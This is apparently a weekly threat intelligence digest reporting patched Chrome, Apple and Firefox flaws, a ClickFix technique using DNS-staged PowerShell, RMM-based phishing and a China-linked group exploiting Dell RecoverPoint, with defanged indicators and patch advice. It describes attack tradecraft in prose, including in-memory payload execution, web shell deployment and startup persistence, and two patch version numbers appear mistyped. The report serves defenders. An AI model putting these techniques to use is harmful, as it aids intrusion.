Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Google Patches Actively Exploited Vulnerability Affecting Chrome Tracked as CVE-2026-2441 - On 13 February 2026, Google patched CVE-2026-2441, a high-severity use-after-free vulnerability in Google Chrome that had been actively exploited in the wild. The flaw affects Chrome versions prior to 145.0.7632.75 and is located in the browser’s Cascading Style Sheets (CSS) component across Windows, macOS and Linux platforms. Successful exploitation enables threat actors to execute arbitrary code by means of a maliciously crafted HTML page within Chrome’s sandbox.
The issue was addressed in Chrome versions 145.0.7632.75 and 145.0.7632.76 for Windows and macOS, and 144.0.7559.75 for Linux. Google has not disclosed additional technical details regarding the exploitation in the wild, attributed the activity to any specific threat actor, or identified particular targets.
Apple Patches Actively Exploited Zero-Day CVE-2026-20700 in dyld Across Multiple Operating Systems - On 11 February 2026, Apple patched CVE-2026-20700, an actively exploited memory corruption vulnerability affecting its Dynamic Link Editor (dyld). dyld is a core system component responsible for loading and linking shared libraries at runtime across Apple operating systems. Successful exploitation allows a threat actor with the ability to modify memory to execute arbitrary code on an affected device.
The vulnerability impacts iPhone 11 and later models, iPad Pro 12.9-inch (3rd generation and later), iPad Pro 11-inch (1st generation and later), iPad Air (3rd generation and later), iPad (8th generation and later), iPad mini (5th generation and later), and Mac devices running macOS Tahoe. Apple addressed the issue with the release of iOS 26.3, iPadOS 26.3, macOS Tahoe 26.3, tvOS 26.3, watchOS 26.3 and visionOS 26.3.
Mozilla Patches Firefox Vulnerability CVE-2026-2447 in libvpx - On 16 February 2026, Mozilla patched a heap buffer overflow vulnerability in libvpx, tracked as CVE-2026-2447. The flaw affects Firefox versions prior to 147.0.4, Firefox ESR versions prior to 140.7.1 and 115.32.1, Thunderbird versions prior to 140.7.2, and Thunderbird versions prior to 147.0.2. Successful exploitation could enable threat actors to carry out memory corruption or remote code execution (RCE). At the time of writing, there have been no reports of this vulnerability being exploited in the wild.
To mitigate the risk of exploitation, Insikt Group recommends updating Firefox to version 147.0.4 or later, Firefox ESR to version 140.7.1 or 115.32.1 or later, and Thunderbird to version 140.7.2 or 147.0.2 or later.
Potential Threats
New ClickFix Technique Uses Custom DNS Queries to Stage Payload Delivery - On 13 February 2026, Microsoft Security (@msftsecurity on X, formerly Twitter) reported a new ClickFix technique that uses custom DNS queries to stage payload delivery. Targets run a Windows Command Prompt command that performs an nslookup against a hard-coded external DNS server instead of the system’s default resolver. The command extracts the “Name:” field containing a malicious PowerShell instruction, which launches a hidden PowerShell instance to download and execute a second-stage payload in memory. At the time of writing, the URL for the payload returns an error. This DNS-based method allows threat actors to blend malicious activity with normal network traffic and reduce reliance on traditional web delivery.
The second-stage payload attempts to download a ZIP archive containing a portable Python bundle and a malicious script. The script collects system and network information, including OS and hardware details, Active Directory objects, running processes, services, TCP connections and disk volumes, often outputting JSON-formatted data. It enumerates domain users and retrieves DNS configuration before establishing persistence by dropping a VBScript (script.vbs) in %APPDATA%\WPy64-31401\python\ and creating a startup shortcut (MonitoringService.lnk) to execute it automatically.
Threat Actors Embedding RMM Payloads in Zoom, Teams, and Google Meet Phishing Lures - On 12 February 2026, Netskope Threat Labs reported a phishing campaign using fake video conferencing invitations to deliver remote monitoring and management (RMM) tools. The operation targets corporate users of Zoom, Microsoft Teams and Google Meet through spoofed meeting pages hosted on typo-squatted domains such as zoom-meet[.]us. Victims are prompted to install a fraudulent software update, which downloads a digitally signed file posing as a legitimate application and deploys RMM tools including LogMeIn, Datto and ScreenConnect. Because these tools are often pre-approved, threat actors can gain persistent remote access and administrative control without raising immediate alerts.
After gaining access, threat actors use RMM features such as file transfer, remote shell access and screen sharing to exfiltrate data and identify high-value targets. Mass deployment functionality may also be abused to spread additional malware, potentially expanding a single compromise into a broader organisational breach. Netskope did not attribute the campaign or provide details on affected organisations.
Suspected China-Nexus UNC6201 Exploits CVE-2026-22769 in Dell RecoverPoint for Virtual Machines to Deploy SLAYSTYLE Web Shell and GRIMBOLT Backdoor - On 18 February 2026, Google Mandiant reported that UNC6201, a suspected China-linked threat cluster, had exploited CVE-2026-22769, a zero-day hard-coded credential vulnerability in Dell RecoverPoint for Virtual Machines (RP4VM), since mid-2024. The flaw affects RP4VM versions prior to 6.0.3.1 HF1 and allows unauthenticated root access. Compromised appliances were seen communicating with command-and-control infrastructure linked to the BRICKSTORM backdoor, which UNC6201 later replaced with a C# backdoor, GRIMBOLT. Dell confirmed limited exploitation and issued remediation guidance.
UNC6201 used hard-coded credentials in tomcat-users.xml to access the Apache Tomcat Manager interface and deploy a malicious WAR file containing the SLAYSTYLE web shell. Persistence was maintained by modifying convert_hosts.sh and using BRICKSTORM, then GRIMBOLT, which strips .NET metadata to evade detection. Post-compromise activity included creating temporary virtual network interfaces (“Ghost NICs”) on ESXi-hosted VMs to pivot internally and configuring iptables for Single Packet Authorization, monitoring port 443 for triggers and redirecting traffic to port 10443 for five-minute windows.
General News
Europe must adapt to ‘permanent’ cyber and hybrid threats - Cyber and hybrid threats are now a permanent feature of Europe’s security environment, a senior Swedish defence official said Thursday, warning that societies must operate under sustained pressure rather than assume disruptions will be rare. Lisa Gustafsson, director of foreign intelligence and cyber at the Swedish Ministry of Defence, cited Russia’s invasion of Ukraine as a turning point that normalised the combined use of military force, economic pressure, information operations and cyber activity.
Gustafsson said conflicts are increasingly below the threshold of open war, with cyber and information campaigns targeting public trust. In response, Sweden is conducting its largest rearmament since the Cold War, rebuilding civil defence, and strengthening national cybersecurity under its “total defence” concept. Civilian authorities protect essential services, the military handles defence-related cyber systems, and the National Cyber Security Centre coordinates efforts with the national computer emergency response team. She stressed collaboration with the private sector, which operates much of Sweden’s critical infrastructure, through structured information sharing and joint preparedness planning.
Microsoft Teams outage affects users in United States, Europe - Microsoft is addressing an ongoing outage affecting Microsoft Teams, causing delays and preventing some users from accessing the service. Reports on DownDetector indicate issues with joining meetings via the Teams desktop client, signing in, and using the app. According to Microsoft’s incident report TM1233974, some users in Europe and the United States may experience failures or delays when sending and receiving chat messages containing inline media such as images, videos, or code snippets. The company has classified the issue as “service degradation” and is reviewing monitoring data to identify the root cause and implement a fix.
Microsoft is also working to resolve related issues, including an incident (TM1231009) blocking some users from joining meetings via the “Join” button, and another (TM1218513) preventing users from adding or updating Copilot Studio agents in Teams. A previous outage in October 2025 affected multiple Microsoft 365 services, including Teams, and caused Multi-Factor Authentication problems for Entra SSO users. Teams is used by over 320 million people each month, according to Microsoft.
Russia tries to block WhatsApp, Telegram in communication blockade - The Russian government is attempting to block WhatsApp as part of its intensified control over communication platforms. WhatsApp called the move “a backwards step” on X, warning it will reduce safety for people in Russia, and pledged to continue efforts to keep users connected. Roskomnadzor, the country’s internet watchdog, had previously excluded whatsapp.com and web.whatsapp.com from Russia’s National DNS to combat crime and fraud, forcing users to rely on VPNs or external resolvers. Reports now indicate attempts to fully block the service, with Meta, WhatsApp’s parent company, already designated an “extremist” entity in Russia since 2022. Restrictions began in August 2025 with throttled voice and video calls, followed by attempts to block new registrations in October 2025.
Presidential press secretary Dmitry Peskov said WhatsApp could resume operations if Meta complies with local laws. The restrictions follow similar measures against Telegram, which has been throttled to encourage use of the Kremlin-controlled MAX messenger app. MAX, developed by VK and mandatory on devices sold in Russia since September 2025, is promoted as secure but has drawn criticism for weak encryption, government access, and extensive data collection. Russian users may still access alternative messengers via VPNs, though these tools are also at risk under the government’s crackdown.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| GRU 85 | ● Basic | → | ● Moderate | ● 49 | → | ● 60 | ● 30 | → | ● 30 |
| Dragon Force Group | ● Moderate | → | ● Moderate | ● 69 | → | ● 68 | ● 49 | → | ● 49 |
| Head Mare | NEW | → | ● Basic | NEW | → | ● 35 | NEW | → | ● 25 |
| GordonFreeman | NEW | → | ● Basic | NEW | → | ● 35 | NEW | → | ● 25 |
| APT73 Ransomware Group |
● Basic | → | ● Basic | ● 25 | → | ● 25 | ● 5 | → | ● 31 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| PalachPro | ▲ | Predator Spyware | ▲ | CVE-2026-22769 | ▲ | Angola | ▲ | |
| SERVER KILLERS | ▲ | APT73 Ransomware | ▲ | CVE-2026-2441 | ▲ | Palantir Technologies | ▲ | |
| Kim Dotcom | ▲ | Stealware | ▲ | CVE-2026-1281 | ▲ | Eurail Group | ▲ | |
| Space Bears Ransomware Group | ▲ |
Unauthorized Access |
▲ | CVE-2026-1340 | ▲ | Canada Goose | ▲ | |
| Lapsu$ Group | ▲ | Social Engineering | ▲ | CVE-2026-1731 | ▲ | Benelux ISP's | ▲ | |
Prominent Information Security Events
New ClickFix Technique Uses Custom DNS Queries to Stage Payload Delivery
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - 4c5d243611978d7aa0e5c17801627204ba1719dacd13a7cda6a022f6d6720275
IOC: URL - hxxp://64[.]227[.]40[.]197/o
On 13 February 2026, Microsoft Security (@msftsecurity on X, formerly Twitter) reported a new ClickFix technique using custom DNS queries to stage malware. Targets run a Windows Command Prompt command that performs an nslookup against a hard-coded external DNS server, extracting the “Name:” field containing a malicious PowerShell instruction. This launches a hidden PowerShell process that attempts to download a second-stage payload via Invoke-WebRequest and executes it in memory with Invoke-Expression (IEX). The DNS-based approach hides activity in normal network traffic and reduces reliance on traditional web delivery.
The second-stage payload retrieves a ZIP archive containing a portable Python bundle and malicious script. The script collects system and network information, enumerates users and Active Directory objects, lists TCP connections, disk volumes, running processes and services, and retrieves the current user, often formatting output in JSON for automated processing.
For persistence, the script drops a VBScript (script.vbs) in %APPDATA%\WPy64-31401\python\ and creates a startup shortcut (MonitoringService.lnk) in %STARTUP%\ to execute it at login. This ensures continued access while DNS staging and in-memory execution make detection more difficult, showing how threat actors are evading traditional security measures.
Suspected China-Nexus UNC6201 Exploits CVE-2026-22769 in Dell RecoverPoint for Virtual Machines to Deploy SLAYSTYLE Web Shell and GRIMBOLT Backdoor
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - 24a11a26a2586f4fba7bfe89df2e21a0809ad85069e442da98c37c4add369a0c
IOC: IP - 149[.]248[.]11[.]71
On 18 February 2026, Google Mandiant reported that UNC6201, a suspected China-linked threat cluster, had exploited a zero-day hard-coded credential vulnerability, CVE-2026-22769, in Dell RecoverPoint for Virtual Machines (RP4VM) since mid-2024. The vulnerability affects RP4VM versions prior to 6.0.3.1 HF1 and allows unauthenticated root access. Compromised appliances communicated with command-and-control infrastructure linked to the BRICKSTORM backdoor, which UNC6201 replaced in September 2025 with a new C# backdoor, GRIMBOLT, compiled with .NET Native Ahead-of-Time and packed with UPX. Dell confirmed limited exploitation and provided remediation guidance.
UNC6201 exploited the flaw by using hard-coded credentials in tomcat-users.xml to access the Apache Tomcat Manager interface and upload a malicious WAR file via /manager/text/deploy, deploying the SLAYSTYLE web shell for root command execution. Persistence was maintained by modifying convert_hosts.sh, which runs at boot via rc.local, while BRICKSTORM was later replaced by GRIMBOLT, which removes common intermediate language metadata to evade detection.
Post-compromise activity included creating temporary virtual network interfaces on ESXi-hosted virtual machines, or “Ghost NICs,” to pivot into internal and software-as-a-service environments. UNC6201 also configured iptables for Single Packet Authorization, monitoring port 443 for a specific hex-string trigger, allowlisting the source IP and redirecting traffic to port 10443 for five-minute windows, enabling controlled and stealthy access.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
-
CVE-2026-2441 (Chrome) – This vulnerability can be addressed by upgrading Chrome to versions 145.0.7632.75 and 145.0.7632.76 for Windows and macOS, and 144.0.07559.75 for Linux.
-
CVE-2026-20700 (Apple dyld) – This vulnerability can be addressed by updating to iOS 26.3, iPadOS 26.3, macOS Tahoe 26.3, tvOS 26.3, watchOS 26.3 and visionOS 26.3.
-
CVE-2026-2447 (Firefox) – This vulnerability can be addressed by patching Firefox to version 147.07.4.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.